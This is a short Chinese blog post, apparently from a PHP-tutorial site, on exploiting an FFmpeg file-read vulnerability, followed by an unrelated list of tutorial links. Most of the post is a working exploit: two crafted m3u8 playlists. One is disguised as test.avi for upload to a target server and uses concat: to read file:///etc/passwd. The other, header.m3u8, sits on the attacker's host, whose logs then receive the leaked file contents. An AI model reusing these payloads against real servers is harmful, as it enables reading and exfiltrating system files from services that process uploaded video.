【www.bbyears.com--php入门】
昨天经历过ImageMagick命令执行漏洞的洗礼之后,今天又有FFmpeg文件读取漏洞,真是激情的一周啊!
看了老外写的文章,大概理解的利用方式如下:
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://www.nxadmin.com/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST
以上内容保存成test.avi,是用来上传到被攻击服务器的。
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://www.111cn.net
以上内容保存成header.m3u8,将header.m3u8上传到你的服务器,然后把test.avi上传到攻击服务器,如果有漏洞,会收到如下的日志:
会收到三条日志记录,第一条是请求header.m3u8文件的,第三条中就包含了读取的部分文件内容,说明是存在此漏洞的。
1
[oracle数据库truncate]oracle数据库trunc函数用法详解
2
[oracle数据库安装]Oracle数据库利用spool导出数据例子
3
routeros入门到精通_RouterOS 设置VPN自动拨号实现科学上网
4
【bash脚本 let】Bash脚本学习笔记快速入门篇
5
oracle数据库安装|oracle数据库提示ORA-27069: skgfdisp: 尝试在文件范围外执行 I/O
6
dom是什么属性_dom入门教程:DOM 的属性和方法
7
php入门教程_Php入门教程之PHP注释符号和格式
8
oracle数据库安装_oracle数据库ORA-00600原因分析
9
安卓手机android开发入门教程_安卓手机Android开发入门篇 环境配置安装
10
oracle数据库安装|oracle数据库ORA-600 2663 错误问题解决办法